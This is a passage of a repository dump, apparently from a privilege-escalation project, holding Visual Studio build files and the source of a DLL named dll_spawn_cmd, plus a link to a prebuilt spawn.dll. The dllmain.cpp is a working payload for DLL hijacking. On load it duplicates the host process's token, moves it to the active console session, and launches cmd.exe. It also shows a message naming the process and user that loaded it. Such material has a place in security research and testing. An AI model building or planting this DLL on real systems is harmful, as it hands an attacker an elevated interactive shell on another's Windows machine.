 82 |     <TargetName>DLLSPAWNCMD</TargetName>
 83 |     <LinkIncremental>false</LinkIncremental>
 84 |   </PropertyGroup>
 85 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
 86 |     <TargetName>DLLSPAWNCMD</TargetName>
 87 |     <LinkIncremental>false</LinkIncremental>
 88 |   </PropertyGroup>
 89 |   <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
 90 |     <ClCompile>
 91 |       <PrecompiledHeader>Use</PrecompiledHeader>
 92 |       <WarningLevel>Level3</WarningLevel>
 93 |       <SDLCheck>true</SDLCheck>
 94 |       <PreprocessorDefinitions>WIN32;_DEBUG;DLLSPAWNCMD_EXPORTS;_WINDOWS;_USRDLL;%(PreprocessorDefinitions)</PreprocessorDefinitions>
 95 |       <ConformanceMode>true</ConformanceMode>
 96 |       <PrecompiledHeaderFile>pch.h</PrecompiledHeaderFile>
 97 |     </ClCompile>
 98 |     <Link>
 99 |       <SubSystem>Windows</SubSystem>
100 |       <GenerateDebugInformation>true</GenerateDebugInformation>
101 |       <EnableUAC>false</EnableUAC>
102 |     </Link>
103 |   </ItemDefinitionGroup>
104 |   <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
105 |     <ClCompile>
106 |       <PrecompiledHeader>Use</PrecompiledHeader>
107 |       <WarningLevel>Level3</WarningLevel>
108 |       <SDLCheck>true</SDLCheck>
109 |       <PreprocessorDefinitions>_DEBUG;DLLSPAWNCMD_EXPORTS;_WINDOWS;_USRDLL;%(PreprocessorDefinitions)</PreprocessorDefinitions>
110 |       <ConformanceMode>true</ConformanceMode>
111 |       <PrecompiledHeaderFile>pch.h</PrecompiledHeaderFile>
112 |     </ClCompile>
113 |     <Link>
114 |       <SubSystem>Windows</SubSystem>
115 |       <GenerateDebugInformation>true</GenerateDebugInformation>
116 |       <EnableUAC>false</EnableUAC>
117 |     </Link>
118 |   </ItemDefinitionGroup>
119 |   <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
120 |     <ClCompile>
121 |       <PrecompiledHeader>Use</PrecompiledHeader>
122 |       <WarningLevel>Level3</WarningLevel>
123 |       <FunctionLevelLinking>true</FunctionLevelLinking>
124 |       <IntrinsicFunctions>true</IntrinsicFunctions>
125 |       <SDLCheck>true</SDLCheck>
126 |       <PreprocessorDefinitions>WIN32;NDEBUG;DLLSPAWNCMD_EXPORTS;_WINDOWS;_USRDLL;%(PreprocessorDefinitions)</PreprocessorDefinitions>
127 |       <ConformanceMode>true</ConformanceMode>
128 |       <PrecompiledHeaderFile>pch.h</PrecompiledHeaderFile>
129 |     </ClCompile>
130 |     <Link>
131 |       <SubSystem>Windows</SubSystem>
132 |       <EnableCOMDATFolding>true</EnableCOMDATFolding>
133 |       <OptimizeReferences>true</OptimizeReferences>
134 |       <GenerateDebugInformation>true</GenerateDebugInformation>
135 |       <EnableUAC>false</EnableUAC>
136 |     </Link>
137 |   </ItemDefinitionGroup>
138 |   <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
139 |     <ClCompile>
140 |       <PrecompiledHeader>Use</PrecompiledHeader>
141 |       <WarningLevel>Level3</WarningLevel>
142 |       <FunctionLevelLinking>true</FunctionLevelLinking>
143 |       <IntrinsicFunctions>true</IntrinsicFunctions>
144 |       <SDLCheck>true</SDLCheck>
145 |       <PreprocessorDefinitions>NDEBUG;DLLSPAWNCMD_EXPORTS;_WINDOWS;_USRDLL;%(PreprocessorDefinitions)</PreprocessorDefinitions>
146 |       <ConformanceMode>true</ConformanceMode>
147 |       <PrecompiledHeaderFile>pch.h</PrecompiledHeaderFile>
148 |     </ClCompile>
149 |     <Link>
150 |       <SubSystem>Windows</SubSystem>
151 |       <EnableCOMDATFolding>true</EnableCOMDATFolding>
152 |       <OptimizeReferences>true</OptimizeReferences>
153 |       <GenerateDebugInformation>true</GenerateDebugInformation>
154 |       <EnableUAC>false</EnableUAC>
155 |     </Link>
156 |   </ItemDefinitionGroup>
157 |   <ItemGroup>
158 |     <None Include="cpp.hint" />
159 |   </ItemGroup>
160 |   <ItemGroup>
161 |     <ClInclude Include="dll_spawn_cmd.h" />
162 |     <ClInclude Include="framework.h" />
163 |     <ClInclude Include="pch.h" />
164 |   </ItemGroup>
165 |   <ItemGroup>
166 |     <ClCompile Include="dllmain.cpp" />
167 |     <ClCompile Include="dll_spawn_cmd.cpp" />
168 |     <ClCompile Include="pch.cpp">
169 |       <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">Create</PrecompiledHeader>
170 |       <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">Create</PrecompiledHeader>
171 |       <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">Create</PrecompiledHeader>
172 |       <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Release|x64'">Create</PrecompiledHeader>
173 |     </ClCompile>
174 |   </ItemGroup>
175 |   <Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
176 |   <ImportGroup Label="ExtensionTargets">
177 |   </ImportGroup>
178 | </Project>


--------------------------------------------------------------------------------
/src/dll_spawn_cmd/dll_spawn_cmd/dll_spawn_cmd.vcxproj.filters:
--------------------------------------------------------------------------------
 1 | <?xml version="1.0" encoding="utf-8"?>
 2 | <Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
 3 |   <ItemGroup>
 4 |     <Filter Include="Source Files">
 5 |       <UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier>
 6 |       <Extensions>cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx</Extensions>
 7 |     </Filter>
 8 |     <Filter Include="Header Files">
 9 |       <UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier>
10 |       <Extensions>h;hh;hpp;hxx;hm;inl;inc;ipp;xsd</Extensions>
11 |     </Filter>
12 |     <Filter Include="Resource Files">
13 |       <UniqueIdentifier>{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}</UniqueIdentifier>
14 |       <Extensions>rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms</Extensions>
15 |     </Filter>
16 |   </ItemGroup>
17 |   <ItemGroup>
18 |     <None Include="cpp.hint" />
19 |   </ItemGroup>
20 |   <ItemGroup>
21 |     <ClInclude Include="framework.h">
22 |       <Filter>Header Files</Filter>
23 |     </ClInclude>
24 |     <ClInclude Include="dll_spawn_cmd.h">
25 |       <Filter>Header Files</Filter>
26 |     </ClInclude>
27 |     <ClInclude Include="pch.h">
28 |       <Filter>Header Files</Filter>
29 |     </ClInclude>
30 |   </ItemGroup>
31 |   <ItemGroup>
32 |     <ClCompile Include="dll_spawn_cmd.cpp">
33 |       <Filter>Source Files</Filter>
34 |     </ClCompile>
35 |     <ClCompile Include="dllmain.cpp">
36 |       <Filter>Source Files</Filter>
37 |     </ClCompile>
38 |     <ClCompile Include="pch.cpp">
39 |       <Filter>Source Files</Filter>
40 |     </ClCompile>
41 |   </ItemGroup>
42 | </Project>


--------------------------------------------------------------------------------
/src/dll_spawn_cmd/dll_spawn_cmd/dll_spawn_cmd.vcxproj.user:
--------------------------------------------------------------------------------
1 | <?xml version="1.0" encoding="utf-8"?>
2 | <Project ToolsVersion="Current" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
3 |   <PropertyGroup />
4 | </Project>


--------------------------------------------------------------------------------
/src/dll_spawn_cmd/dll_spawn_cmd/dllmain.cpp:
--------------------------------------------------------------------------------
 1 | // dllmain.cpp : Defines the entry point for the DLL application.
 2 | #include "pch.h"
 3 | #include <filesystem>   
 4 | #include <wtsapi32.h>
 5 | #include <Lmcons.h>
 6 | #include <iostream>
 7 | #include <string>
 8 | #include <Windows.h>
 9 | #include <wtsapi32.h>
10 | 
11 | #pragma comment(lib, "Wtsapi32.lib")
12 | 
13 | using namespace std;
14 | 
15 | wstring expandPath(const wchar_t* input) {
16 |     wchar_t szEnvPath[MAX_PATH];
17 |     ::ExpandEnvironmentStringsW(input, szEnvPath, MAX_PATH);
18 |     return szEnvPath;
19 | }
20 | 
21 | auto getUsername() {
22 |     wchar_t usernamebuf[UNLEN + 1];
23 |     DWORD size = UNLEN + 1;
24 |     GetUserName((TCHAR*)usernamebuf, &size);
25 |     static auto username = wstring{ usernamebuf };
26 |     return username;
27 | }
28 | 
29 | auto getProcessFilename() {
30 |     wchar_t process_filenamebuf[MAX_PATH]{ 0x0000 };
31 |     GetModuleFileName(0, process_filenamebuf, MAX_PATH);
32 |     static auto process_filename = wstring{ process_filenamebuf };
33 |     return process_filename;
34 | }
35 | 
36 | auto getModuleFilename(HMODULE hModule = nullptr) {
37 |     wchar_t module_filenamebuf[MAX_PATH]{ 0x0000 };
38 |     if (hModule != nullptr) GetModuleFileName(hModule, module_filenamebuf, MAX_PATH);
39 |     static auto module_filename = wstring{ module_filenamebuf };
40 |     return module_filename;
41 | }
42 | 
43 | bool showMessage() {
44 |     Beep(4000, 400);
45 |     Beep(4000, 400);
46 |     Beep(4000, 400);
47 | 
48 |     auto m = L"This file:\n"s + getModuleFilename() + L"\nwas loaded by:\n"s + getProcessFilename() + L"\nrunning as:\n" + getUsername();
49 |     auto message = (wchar_t*)m.c_str();
50 |     DWORD messageAnswer{};
51 |     WTSSendMessage(WTS_CURRENT_SERVER_HANDLE, WTSGetActiveConsoleSessionId(), (wchar_t*)L"", 0, message, lstrlenW(message) * 2, 0, 0, &messageAnswer, true);
52 | 
53 |     return true;
54 | }
55 | bool spawnShell()
56 | {
57 |     STARTUPINFO startInfo = { 0x00 };
58 |     startInfo.cb = sizeof(startInfo);
59 |     startInfo.wShowWindow = SW_SHOW;
60 |     startInfo.lpDesktop = const_cast<wchar_t*>(L"WinSta0\\Default");
61 | 
62 |     PROCESS_INFORMATION procInfo = { 0x00 };
63 | 
64 |     HANDLE hToken = {};
65 |     DWORD  sessionId = WTSGetActiveConsoleSessionId();
66 | 
67 |     OpenProcessToken(GetCurrentProcess(), TOKEN_ALL_ACCESS, &hToken);
68 |     DuplicateTokenEx(hToken, TOKEN_ALL_ACCESS, nullptr, SecurityAnonymous, TokenPrimary, &hToken);
69 | 
70 |     SetTokenInformation(hToken, TokenSessionId, &sessionId, sizeof(sessionId));
71 | 
72 |     if (CreateProcessAsUser(hToken,
73 |         expandPath(L"%WINDIR%\\system32\\cmd.exe").c_str(),
74 |         const_cast<wchar_t*>(L""),
75 |         nullptr,
76 |         nullptr,
77 |         FALSE,
78 |         NORMAL_PRIORITY_CLASS | CREATE_NEW_CONSOLE,
79 |         nullptr,
80 |         nullptr,
81 |         &startInfo,
82 |         &procInfo
83 |     )
84 |         ) {
85 |         CloseHandle(procInfo.hProcess);
86 |         CloseHandle(procInfo.hThread);
87 |     }
88 | 
89 |     return true;
90 | }
91 | static const auto init = spawnShell();
92 | 
93 | BOOL APIENTRY DllMain(HMODULE hModule, DWORD  ul_reason_for_call, LPVOID lpReserved)
94 | {
95 |     getModuleFilename(hModule);
96 |     static auto const msgshown = showMessage();
97 | }


--------------------------------------------------------------------------------
/src/dll_spawn_cmd/dll_spawn_cmd/framework.h:
--------------------------------------------------------------------------------
1 | #pragma once
2 | 
3 | #define WIN32_LEAN_AND_MEAN             // Exclude rarely-used stuff from Windows headers
4 | // Windows Header Files
5 | #include <windows.h>
6 | 


--------------------------------------------------------------------------------
/src/dll_spawn_cmd/dll_spawn_cmd/pch.cpp:
--------------------------------------------------------------------------------
1 | // pch.cpp: source file corresponding to the pre-compiled header
2 | 
3 | #include "pch.h"
4 | 
5 | // When you are using pre-compiled headers, this source file is necessary for compilation to succeed.
6 | 


--------------------------------------------------------------------------------
/src/dll_spawn_cmd/dll_spawn_cmd/pch.h:
--------------------------------------------------------------------------------
 1 | // pch.h: This is a precompiled header file.
 2 | // Files listed below are compiled only once, improving build performance for future builds.
 3 | // This also affects IntelliSense performance, including code completion and many code browsing features.
 4 | // However, files listed here are ALL re-compiled if any one of them is updated between builds.
 5 | // Do not add files here that you will be updating frequently as this negates the performance advantage.
 6 | 
 7 | #ifndef PCH_H
 8 | #define PCH_H
 9 | 
10 | // add headers that you want to pre-compile here
11 | #include "framework.h"
12 | 
13 | #endif //PCH_H
14 | 


--------------------------------------------------------------------------------
/src/dll_spawn_cmd/x64/Release/spawn.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/binderlabs/DirCreate2System/2a48d7da731858d1b7e2aad2c974acd29c07bcd7/src/dll_spawn_cmd/x64/Release/spawn.dll


--------------------------------------------------------------------------------